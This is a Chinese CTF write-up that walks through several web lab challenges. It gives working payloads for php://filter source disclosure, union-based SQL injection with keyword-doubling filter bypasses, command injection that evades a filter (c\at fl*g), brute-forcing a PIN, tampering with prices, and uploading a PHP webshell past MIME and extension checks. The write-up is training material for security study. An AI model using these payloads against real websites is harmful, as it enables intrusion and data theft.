web题复现

一个朴实的页面

 打开题目后发现无论在输入框怎么输入都无法输入成功,鼠标和键盘输入也都没有作用,也无法通过快捷键和鼠标查看源代码,最后通过网页的菜单栏成功查看了网页源代码。

 我们在源代码中发现了本题禁止了所有查看源代码的方法。

通过网页的提示“web拿到一个网站第一步应该怎么做”,我们想到拿御剑扫描一下这个网站,得到了含有robots协议的两个网址。

 点击第一个网址后得到了一个php文件。

我们将文件输入到地址栏中,得到了网页源代码。通过源代码我们可以知道本题屏蔽了base,我们可以将小写的base替换为大写的Base。

 输入构建以下语句将flag转换为base64编码进行查看。将得到的编码进行解码得到flag。

?G7=php://filter/convert.Base64-encode/resource=flag.php

斗宗强者恐怖如斯

点开题目后是一个登录页面,通过题目的提示得到用户名是admin,我们接着用弱口令进行尝试得到密码是admin123.成功登录后的界面是两个问号

我们尝试进行注入 ,输入id=1’,报错,说明存在注入点。

接着判断字段个数,输入,有回显,证明表中只存在3列。

?id=-1') union select 1,2,3--+

 ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 爆出数据库名。接着爆出表名,但是报错了,通过报错信息可知information少了or

?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’xitif_sql’ --+


 我们进行修改,修改后,爆出表名,发现flag文件

?id=-1’) union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=’xitif_sql’ --+

接着进行爆表中的字段,得到flAg文件。?id=-1') union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag' --+

最后利用?id=-1') union select 1,2,group_concat(flAg) from xitif_sql.flag --+打开文件,得到flag。

 Rceeee

打开后是源代码,通过观察可知本题屏蔽了大量字符

通过构建?cmd=ls/|tee a.txt打开文件目录

因为本题屏蔽了cat flag 等字符所以我们用c\at fl*g代替,构建?cmd=c\at/fl*g|tee a.txt 来打开flag文件。

师姐的生日

由题目可知师姐的生日是四位数,首先利用bp进行抓包,导入字典进行爆破,师姐的生日为四位数,所以最大值和最小值都设置为4,从0000到9999进行爆破。

ddf71aded3ed4fd48a8716fa0b853215.png

爆破后得到师姐的生日为0326,将生日输入后得到本题的flag 。

5a951fb4a26d4df5b9f1daac0ce404d8.png008378e2cc414cfb8ea52e4b172c8504.png 云曦超市大甩卖

 打开题目后发现一共有几个商品,其中有flag,需要999999,但是自己只有1000,没有足够的钱去购买flag,我们先打开bp进行抓包,发现其中代码中有价格,我们可以将题目中的商品价格进行修改,使得我们能够买得起flag。将商品价格改为-9999,利用了逻辑漏洞,使我们越买东西钱越多,那样我们就可以买得起flag了。修改完代码后,我们再次购买几个物品,我们的钱就可以买flag了,购买flag后就得到了本题的flag。

1bcf2a5b377542b2bf97e5071bc88708.png82b5295236a14af1a21a739090ae6fc5.png

 Gentle_sister

打开题目后是一张图片,上面有一个点我看看,点击之后发现没有任何显示,查看网页源代码也是什么都没有,于是我们返回图片,查看图片的源代码,发现其中有一串代码

if(isset ($_GET['my_parameter'])) (
    $param_name = $_GETl'my_parameter'];
    if (preg_match("/[o-9]/", $my_parameter)){
        die ("error!");
    }
    if(intval ($my_parameter)){
    echo $flag;
    }

ea2ca1c5abd543e8b8c572ebc0bf42e0.png

输入paramenter[]1,即可得到本题的flag。

937a8cd41f444f2383d884c3ad40fed0.png

这都不做

由题目可知是一道文件上传类型的题,我们首先上传了一个包含一句话木马的php文件,结果显示application/octet-streaminvalid file type!jpg only!!通过搜索发现该文件时MIME型文件。

d306846d307843cf89f1b71aeb81e03f.png

 我们通过bp进行抓包,将文件类型改为image/jpeg.

d5371217bda9495a867ed4e79e58636b.png

 改完后继续上传文件,结果还是上传不了,通过搜索发现是服务器被设置为不允许通过文件URL访问PHP解析器

7609a9dade7143e4b0b70c73e729a7bf.png

我们继续修改,将PHP删除改为-,再次上传文件

001fab3b67034636be8d9076bb7d76b9.png

显示上传成功,问我们上传路径是什么

babf888ca28549cfa23e87f6e8de08c7.png

 我们在地址栏输入172.16.17.201:50142/upload/1.php,结果显示无法显示,得知上传路径错误,通过尝试发现文件上传中包含双写绕过

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值